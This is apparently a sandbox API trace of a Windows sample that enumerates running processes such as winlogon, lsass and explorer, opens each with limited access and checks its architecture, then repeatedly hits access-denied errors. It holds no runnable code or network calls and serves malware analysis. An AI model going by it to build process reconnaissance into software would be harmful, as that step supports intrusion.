	[0074.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0074.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0074.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0074.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0074.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0074.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd30, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0074.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0074.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0074.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0074.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0074.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0074.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0074.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0074.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0074.342] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.342] CloseHandle (hObject=0x224) returned 1
	[0074.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0074.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0074.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728858, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0074.343] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.343] CloseHandle (hObject=0x224) returned 1
	[0074.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7289f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0074.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0074.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0074.343] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.343] CloseHandle (hObject=0x224) returned 1
	[0074.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0074.343] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.343] CloseHandle (hObject=0x224) returned 1
	[0074.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0074.343] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.343] CloseHandle (hObject=0x224) returned 1
	[0074.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0074.344] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.344] CloseHandle (hObject=0x224) returned 1
	[0074.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7288b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0074.344] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.344] CloseHandle (hObject=0x224) returned 1
	[0074.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0074.344] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.344] CloseHandle (hObject=0x224) returned 1
	[0074.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0074.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0074.344] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.344] CloseHandle (hObject=0x224) returned 1
	[0074.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0074.345] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.345] CloseHandle (hObject=0x224) returned 1
	[0074.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0074.345] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.345] CloseHandle (hObject=0x224) returned 1
	[0074.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728958, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0074.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0074.345] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.345] CloseHandle (hObject=0x224) returned 1
	[0074.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0074.345] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.345] CloseHandle (hObject=0x224) returned 1
	[0074.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0074.346] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.346] CloseHandle (hObject=0x224) returned 1
	[0074.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728a98, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0074.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0074.346] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.346] CloseHandle (hObject=0x224) returned 1
	[0074.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e680, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0074.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0074.346] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.346] CloseHandle (hObject=0x224) returned 1
	[0074.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728838, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0074.346] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.347] CloseHandle (hObject=0x224) returned 1
	[0074.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0074.347] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.347] CloseHandle (hObject=0x224) returned 1
	[0074.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0074.347] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.347] CloseHandle (hObject=0x224) returned 1
	[0074.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728a58, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0074.347] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.347] CloseHandle (hObject=0x224) returned 1
	[0074.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728978, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0074.348] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.348] CloseHandle (hObject=0x224) returned 1
	[0074.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0074.348] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.348] CloseHandle (hObject=0x224) returned 1
	[0074.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0074.348] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.348] CloseHandle (hObject=0x224) returned 1
	[0074.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e6a8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0074.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0074.348] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.348] CloseHandle (hObject=0x224) returned 1
	[0074.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772158, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0074.349] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.349] CloseHandle (hObject=0x224) returned 1
	[0074.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0074.349] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.349] CloseHandle (hObject=0x224) returned 1
	[0074.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728998, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0074.349] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.349] CloseHandle (hObject=0x224) returned 1
	[0074.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0074.349] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.349] CloseHandle (hObject=0x224) returned 1
	[0074.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728a18, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0074.349] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.349] CloseHandle (hObject=0x224) returned 1
	[0074.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e770, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0074.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0074.350] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.350] CloseHandle (hObject=0x224) returned 1
	[0074.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e8d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0074.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.350] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.350] CloseHandle (hObject=0x224) returned 1
	[0074.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772158, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.350] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
